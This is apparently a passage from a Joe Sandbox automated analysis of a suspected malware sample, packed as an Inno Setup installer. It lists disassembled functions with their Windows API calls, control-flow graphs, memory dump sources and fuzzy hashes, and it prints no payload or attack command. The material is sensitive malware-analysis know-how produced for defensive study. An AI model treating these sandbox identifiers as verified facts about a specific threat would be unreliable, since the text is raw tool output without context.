                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                              • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                              • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                              • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02142344), ref: 0040966C
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(0002042A,000000FC,00409918), ref: 0040A148
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • DestroyWindow.USER32(0002042A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 3757039580-3001827809
                                                                              • Opcode ID: 92d7a146f7fa7ea583be229cf1972f4387f7e731d45899e9009fd1a518b8a977
                                                                              • Instruction ID: f6a9afe5b3848034850d92184c83b7d566fc641e007638e18ad9d31f508a71de
                                                                              • Opcode Fuzzy Hash: 92d7a146f7fa7ea583be229cf1972f4387f7e731d45899e9009fd1a518b8a977
                                                                              • Instruction Fuzzy Hash: 3B411071600204DFD710EBA9EE86B9977A4EB45304F10467EF514B73E2C7B89811CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                              • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                              • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                              • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(0002042A,000000FC,00409918), ref: 0040A148
                                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000,00409A77), ref: 00409A14
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90), ref: 00409A5C
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • DestroyWindow.USER32(0002042A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 3586484885-3001827809
                                                                              • Opcode ID: a64027cc69530ce26e0d020b421cb23cd984c73ff13cd53596b8d38fe4c4ed4c
                                                                              • Instruction ID: bf8877be64b1eb53a955be5febe4cb156f3d413c702a3b20994545be7baf65d7
                                                                              • Opcode Fuzzy Hash: a64027cc69530ce26e0d020b421cb23cd984c73ff13cd53596b8d38fe4c4ed4c
                                                                              • Instruction Fuzzy Hash: 75411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000,00409A77), ref: 00409A14
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000), ref: 00409A28
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                              • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90), ref: 00409A5C
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02142344), ref: 0040966C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                              • String ID: D
                                                                              • API String ID: 3356880605-2746444292
                                                                              • Opcode ID: 752074f715f169f8c9b0a2dfdb1d62babdf7ca20371da5ab86507c15e851728d
                                                                              • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                              • Opcode Fuzzy Hash: 752074f715f169f8c9b0a2dfdb1d62babdf7ca20371da5ab86507c15e851728d
                                                                              • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 730355536-0
                                                                              • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                              • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                              • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                              • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: 025cb7c8070ceb0a973f57dc2423f3e96cefce6b80174f3a3145c26c436c6efd
                                                                              • Instruction ID: 436c98ae07f88f71ec52beeb6e72a39fdb1c754e3b127fd60db974180cd34f4e
                                                                              • Opcode Fuzzy Hash: 025cb7c8070ceb0a973f57dc2423f3e96cefce6b80174f3a3145c26c436c6efd
                                                                              • Instruction Fuzzy Hash: 7541AC30600200DFC715EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: cf567291c84692d100e5ec609b282d55b3c5af0b5f3d357f2e8f357a6d06844b
                                                                              • Instruction ID: effdcd9541676c6323f3fad609c54d18bb0bf767b5f2530b550772909ae59cb2
                                                                              • Opcode Fuzzy Hash: cf567291c84692d100e5ec609b282d55b3c5af0b5f3d357f2e8f357a6d06844b
                                                                              • Instruction Fuzzy Hash: 1F418D70610204DFC715EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: .tmp
                                                                              • API String ID: 1375471231-2986845003
                                                                              • Opcode ID: 7ba2b511fbcbba0bdafc57409f78771f2ffb69bdc1885ec5b7c8c3418ce725e0
                                                                              • Instruction ID: 229665e4fb482f752e04f7b041ef1ce89d659938bfc828767b82506ffacbf3f4
                                                                              • Opcode Fuzzy Hash: 7ba2b511fbcbba0bdafc57409f78771f2ffb69bdc1885ec5b7c8c3418ce725e0
                                                                              • Instruction Fuzzy Hash: 7C213774A04208ABDB05EFA1C8429DFB7B9EF88304F50457BE901B73C2DA7C9E059A65

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 337 407749-40774a 338 4076dc-4076e6 WriteFile 337->338 339 40774c-40776f 337->339 341 4076e8-4076ea call 40748c 338->341 342 4076ef-4076f2 338->342 340 407770-407785 339->340 345 407787 340->345 346 4077f9 340->346 341->342 343 407700-407704 342->343 344 4076f4-4076fb call 4073ec 342->344 344->343 349 40778a-40778f 345->349 350 4077fd-407802 345->350 351 40783b-40783d 346->351 352 4077fb 346->352 355 407803-407819 349->355 357 407791-407792 349->357 350->355 353 407841-407843 351->353 352->350 356 40785b-40785c 353->356 355->356 367 40781b 355->367 358 4078d6-4078eb call 407890 InterlockedExchange 356->358 359 40785e-40788c 356->359 360 407724-407741 357->360 361 407794-4077b4 357->361 382 407912-407917 358->382 383 4078ed-407910 358->383 376 407820-407823 359->376 378 407890-407893 359->378 363 407743 360->363 364 4077b5 360->364 361->364 368 407746-407747 363->368 369 4077b9 363->369 372 4077b6-4077b7 364->372 373 4077f7-4077f8 364->373 374 40781e-40781f 367->374 368->337 375 4077bb-4077cd 368->375 369->375 372->369 373->346 374->376 375->353 379 4077cf-4077d4 375->379 380 407824 376->380 381 407898 376->381 378->381 379->351 388 4077d6-4077de 379->388 385 407825 380->385 386 40789a 380->386 381->386 383->382 383->383 389 407896-407897 385->389 390 407826-40782d 385->390 387 40789f 386->387 391 4078a1 387->391 388->340 400 4077e0 388->400 389->381 390->391 393 40782f 390->393 394 4078a3 391->394 395 4078ac 391->395 397 407832-407833 393->397 398 4078a5-4078aa 393->398 394->398 399 4078ae-4078af 395->399 397->351 397->374 398->399 399->387 401 4078b1-4078bd 399->401 400->373 401->381 402 4078bf-4078c0 401->402
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                              • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                              • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                              • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 403 401fd4-401fe6 404 401fe8 call 401918 403->404 405 401ffb-402010 403->405 409 401fed-401fef 404->409 407 402012-402017 RtlEnterCriticalSection 405->407 408 40201c-402025 405->408 407->408 410 402027 408->410 411 40202c-402032 408->411 409->405 412 401ff1-401ff6 409->412 410->411 413 402038-40203c 411->413 414 4020cb-4020d1 411->414 417 40214f-402158 412->417 415 402041-402050 413->415 416 40203e 413->416 418 4020d3-4020e0 414->418 419 40211d-40211f call 401ee0 414->419 415->414 420 402052-402060 415->420 416->415 422 4020e2-4020ea 418->422 423 4020ef-40211b call 402f54 418->423 427 402124-40213b 419->427 425 402062-402066 420->425 426 40207c-402080 420->426 422->423 423->417 429 402068 425->429 430 40206b-40207a 425->430 432 402082 426->432 433 402085-4020a0 426->433 435 402147 427->435 436 40213d-402142 RtlLeaveCriticalSection 427->436 429->430 434 4020a2-4020c6 call 402f54 430->434 432->433 433->434 434->417 436->435
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 296031713-0
                                                                              • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                              • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                              • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                              • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 439 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLibraryLoadMode
                                                                              • String ID:
                                                                              • API String ID: 2987862817-0
                                                                              • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                              • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 443 40762c-40764a ReadFile 444 407663-40766a 443->444 445 40764c-407650 443->445 446 407652-40765a GetLastError 445->446 447 40765c-40765e call 40748c 445->447 446->444 446->447 447->444
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastRead
                                                                              • String ID:
                                                                              • API String ID: 1948546556-0
